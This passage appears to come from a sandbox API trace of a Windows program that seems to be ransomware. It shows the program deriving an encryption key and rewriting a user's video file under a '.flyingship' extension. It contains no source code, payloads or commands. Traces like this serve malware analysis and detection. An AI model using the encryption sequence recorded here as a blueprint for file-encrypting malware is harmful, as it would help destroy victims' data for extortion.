HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.074] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.074] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0198.074] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.074] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.074] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.074] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.074] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.074] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.075] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7ff05d0, ftCreationTime.dwHighDateTime=0x1d5e6a3, ftLastAccessTime.dwLowDateTime=0x5a7a7540, ftLastAccessTime.dwHighDateTime=0x1d5dd98, ftLastWriteTime.dwLowDateTime=0x5a7a7540, ftLastWriteTime.dwHighDateTime=0x1d5dd98, nFileSizeHigh=0x0, nFileSizeLow=0x180a6, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="NsEh3.swf", cAlternateFileName="")) returned 0x90af58 [0198.075] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.075] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.075] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0198.075] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0198.075] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.075] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.075] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0198.076] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0198.076] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.082] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0198.082] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.082] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.082] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.082] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.082] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0198.082] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0198.082] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.082] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.082] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0198.082] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.082] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.082] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.083] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0198.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.083] CryptDestroyHash (hHash=0x90ae18) returned 1 [0198.083] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\nseh3.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.084] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.084] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0198.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0198.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0198.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0198.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0198.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0198.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.084] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0198.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0198.085] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0198.085] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0198.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0198.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0198.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0198.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0198.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0198.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0198.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0198.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0198.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0198.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0198.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0198.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0198.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0198.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0198.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0198.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0198.086] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo")) returned 0x10 [0198.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0198.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0198.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0198.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0198.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.flyingship.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\nseh3.flyingship.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0198.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0198.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0198.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.089] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0198.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0198.089] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0198.089] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0198.089] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, 